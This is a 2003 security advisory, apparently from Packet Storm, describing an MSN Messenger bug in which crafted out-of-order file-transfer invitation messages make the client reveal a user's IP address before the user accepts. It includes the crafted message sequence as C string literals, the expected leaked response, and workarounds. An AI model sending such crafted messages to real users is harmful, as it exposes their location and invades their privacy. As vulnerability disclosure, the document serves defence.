msnbug.txt

2003-11-25T00:00:00
ID PACKETSTORM:32257
Type packetstorm
Reporter Hi_Tech_Assassin
Modified 2003-11-25T00:00:00

Description

                                        
                                            `MSN Messenger bug  
  
Release Date:  
20/11/03  
  
Discovery date:  
Sometime around 2001 or 2000  
  
Versions Affected:  
------------------  
  
Msn messenger 1.0 -> msn messenger 6.0.0602  
Windows messenger all versions  
  
Not Affected:  
------------  
  
Msn Messenger 6.1, trillian, gaim  
  
Description:  
-----------  
  
A bug exists in Microsofts msn messenger client.   
MSN messenger improperly parses the fields during  
file transfer invitation requests. Particularly   
the request ip field. This makes it possible to   
trick the msn client into giving *away* the users   
ip address without him/her accepting the file   
transfer first.  
  
The bug happens when a specially crafted MSG requests  
are issued to the switchboard server and then  
relayed onto the client. Upon receiving each  
request from the switchboard the client seems  
to incorrectly process the Ip-Address field  
without first waiting for userB to accept the  
file that is being attempted to be sent. It seems  
the reason for this bug is that the msn client  
seems to unsafelly depend on client of userB to send the  
sequences and fields in those sequences in the  
order in which is expected. A malicious user however  
could construct a program that sends them in the  
incorrect order and requests userB for the ip  
address before userB asks userA for its ip address  
and userBs client will falselly hand out the ip  
address. This circumvents the whole thing and  
allows us to invade the users privacy by handing  
out such sensitive info.  
  
Below are example of *expected* exchange of data  
(this however can be exploited)  
  
Example:  
  
>>> MSG 4 N 277  
MIME-Version: 1.0  
Content-Type: text/x-msmsgsinvite; charset=UTF-8  
  
Application-Name: File Transfer  
Application-GUID: {5D3E02AB-6190-11d3-BBBB-00C04F795683}  
Invitation-Command: INVITE  
Invitation-Cookie: 33267  
Application-File: readme.txt  
Application-FileSize: 60904  
  
  
<<< MSG example@passport.com Tim 179  
MIME-Version: 1.0  
Content-Type: text/x-msmsgsinvite; charset=UTF-8  
  
Invitation-Command: ACCEPT  
Invitation-Cookie: 33267  
Launch-Application: FALSE  
Request-Data: IP-Address:  
  
  
>>> MSG 4 N 238  
MIME-Version: 1.0  
Content-Type: text/x-msmsgsinvite; charset=UTF-8  
  
Invitation-Command: ACCEPT  
Invitation-Cookie: 33267  
IP-Address: 10.44.102.65  
Port: 6891  
AuthCookie: 93301  
Launch-Application: FALSE  
Request-Data: IP-Address:  
  
However to exploit the bug we would send the below   
  
"MSG 1 N 275\r\n"  
"MIME-Version: 1.0\r\n"  
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"  
"\r\n"  
"Application-Name: File Transfer\r\n"  
"Application-GUID: {5D3E02AB-6190-11d3-BBBB-00C04F795683}\r\n"  
"Invitation-Command: INVITE\r\n"  
"Invitation-Cookie: 1\r\n"  
"Application-File: wanker.\xdd\xff\xcf\xee\xcd\x0a\x0fjpg\r\n"  
"Application-FileSize: 10\r\n"  
"MSG 2 N 191\r\n"   
"MIME-Version: 1.0\r\n"  
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"  
"\r\n"  
"Invitation-Command: ACCEPT\r\n"  
"Invitation-Cookie: 1\r\n"  
"AuthCookie: 10\r\n"  
"Launch-Application: FALSE\r\n"  
"Request-Data: IP-Address:\r\n"  
"MSG 3 N 143\r\n"  
"MIME-Version: 1.0\r\n"  
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"  
"\r\n"  
"Invitation-Command: CANCEL\r\n"  
"Invitation-Cookie: 1\r\n"  
"Cancel-Code: TIMEOUT\r\n"  
  
We should get a response of something like below  
  
Invitation-Command: ACCEPT  
Invitation-Cookie: 1  
IP-Address: 81.131.24.31  
Port: 6892  
PortX: 11181  
AuthCookie: 15784036  
Launch-Application: FALSE  
Request-Data: IP-Address:  
  
Code will be made public sometime in the future to  
demonstrate the bug.  
  
Severity:  
~~~~~~~~~  
  
This bug has been activelly exploited in the wild.  
Due to the transition to the new msnp protocol  
however many of the variants that derived due to  
sniffing of the original now do not work but it  
is only a matter of time when a new version is  
made widelly available.  
  
Possible fix/workaround:  
~~~~~~~~~~~~~~~~~~~~~~~  
  
The problem may be fixed to some extend by using the  
messenger disallow list to block any uninvited users  
that are not on your allow list. This way you cannot  
be exploited unless you specifically trust the user  
and he is on your allow list.  
  
A mechanism must be included in the msn messenger  
client implementation that first checks that userB  
has accepted the file userA is trying to send  
before processing the Request-Data: Ip-Address:   
field. It seems pretty sad that MS cannot even  
get this right even if its later rather than sooner,   
especially when all third party clients seem to have   
such a mechanism in place thats worked effectivelly.   
I have tested this technique extensivelly with others   
such as trillian and these seem to be safe.  
  
Upgrade to msn messenger 6.1  
  
Credit:  
Discovery: Brice aka THR  
  
Feedback  
Please send suggestions or comments to:  
  
hi_tech_assassin@hackermail.com  
`